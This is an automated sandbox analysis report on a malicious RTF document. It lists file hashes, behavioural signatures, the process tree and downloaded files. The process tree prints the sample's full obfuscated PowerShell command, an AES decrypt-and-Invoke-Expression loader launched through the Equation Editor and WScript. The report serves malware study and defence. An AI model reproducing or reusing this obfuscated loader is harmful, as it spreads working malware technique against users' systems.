Analysis
- max time kernel: 119s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20240708-en
- resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- submitted: 23/07/2024, 12:28
Static task: static1
Behavioral task: behavioral1
- Sample: e628ee1f2b81b8972f53e2b2785d97a1.rtf
- Resource: win7-20240708-en
Behavioral task: behavioral2
- Sample: e628ee1f2b81b8972f53e2b2785d97a1.rtf
- Resource: win10v2004-20240709-en
General
- Target: e628ee1f2b81b8972f53e2b2785d97a1.rtf
- Size: 110KB
- MD5: e628ee1f2b81b8972f53e2b2785d97a1
- SHA1: 0fa0fe5809f166d707fdcf3a2a866b92a761a92b
- SHA256: 8fc89bf19f14cfd251b0023a624d9be2eaf9a41328e7d5c6f1c703fea07c841d
- SHA512: cfb5abf034fb4105fa1f5b23f40b3070427bb862c701fab29457caf15f1f100be6103d783380490cf6afddc7291db17a75f6ab1e19a82e2650072a94eebb6093
- SSDEEP: 768:I6/gj/IOvpQ0dXHynngGCobrwTsiCmWv8E:IV/IWC0diFRbahWkE
Malware Config
Signatures
- Blocklisted process makes network request (4 IoCs)
  flow  pid   Process
  4     2500  EQNEDT32.EXE
  7     2708  WScript.exe
  9     2708  WScript.exe
  10    2128  powershell.exe
- Drops file in System32 directory (1 IoCs)
  description: File opened for modification
  ioc: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
  Process: powershell.exe
- Drops file in Windows directory (1 IoCs)
  description: File opened for modification
  ioc: C:\Windows\Debug\WIA\wiatrace.log
  Process: WINWORD.EXE
- Command and Scripting Interpreter: PowerShell
  pid   Process
  2128  powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Office loads VBA resources, possible macro or embedded object present
- Launches Equation Editor (1 TTPs, 1 IoCs)
  Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
  pid   Process
  2500  EQNEDT32.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  pid   Process
  2088  WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  2128  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description: Token: SeDebugPrivilege
  pid: 2128
  Process: powershell.exe
- Suspicious use of SetWindowsHookEx (2 IoCs)
  pid   Process
  2088  WINWORD.EXE
  2088  WINWORD.EXE
- Suspicious use of WriteProcessMemory (12 IoCs)
  description                       pid   Process         procid_target
  PID 2500 wrote to memory of 2708  2500  EQNEDT32.EXE    33
  PID 2500 wrote to memory of 2708  2500  EQNEDT32.EXE    33
  PID 2500 wrote to memory of 2708  2500  EQNEDT32.EXE    33
  PID 2500 wrote to memory of 2708  2500  EQNEDT32.EXE    33
  PID 2708 wrote to memory of 2128  2708  WScript.exe     35
  PID 2708 wrote to memory of 2128  2708  WScript.exe     35
  PID 2708 wrote to memory of 2128  2708  WScript.exe     35
  PID 2708 wrote to memory of 2128  2708  WScript.exe     35
  PID 2088 wrote to memory of 2880  2088  WINWORD.EXE     37
  PID 2088 wrote to memory of 2880  2088  WINWORD.EXE     37
  PID 2088 wrote to memory of 2880  2088  WINWORD.EXE     37
  PID 2088 wrote to memory of 2880  2088  WINWORD.EXE     37
Processes
- C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (PID 2088, depth 1)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e628ee1f2b81b8972f53e2b2785d97a1.rtf"
  - Drops file in Windows directory
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\splwow64.exe (PID 2880, depth 2)
    Command line: C:\Windows\splwow64.exe 12288
- C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE (PID 2500, depth 1)
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Blocklisted process makes network request
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WScript.exe (PID 2708, depth 2)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingstohappenedarething.vBS"
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2128, depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI00669725676900661955908584003901CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
      - Blocklisted process makes network request
      - Drops file in System32 directory
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT8UAXPK\paste1[1].txt
  Filesize: 156B
  MD5: ad6c37ef980373e9bcbd14810fad34bc
  SHA1: 9c061a1b3608b7c7f1db7cd06c8246913ee11bda
  SHA256: ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c
  SHA512: 30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f
- File 2
  Filesize: 19KB
  MD5: a75a762391d1af754346fddb10db3eac
  SHA1: 19031c985ede96a02d3ddeb813cfcff531e33937
  SHA256: 2f4a0ca8147e2d0644ede162eef4315c71a6c0f2b9605b8a5331c2bde9fddab6
  SHA512: 6a522f67bfa5384746cae0d29dd3abcf3866d002b351993e16f11baa0603afdebf352450d7dcf5a0ad2d314e3ed6247978f11ca4d96df42bf2b0c1d2441b4fa3
- File 3
  Filesize: 54KB
  MD5: cfbf2e7faea58e9249d4e5f6520851a2
  SHA1: b27795e6e6282d7d3888ab39f77ad314139497fc
  SHA256: 89c3771f859200a6c3e2d7aea98d0e4c2c21741d9d2117e47dfc2849523be39a
  SHA512: c5e71d2cd63debf13c2c57807aaeb819f2077423c8ce86770c7d803054fa9f02304fff646ea8f018198089ac2ca1d565a2faab93916be86ff357c6c529e5c164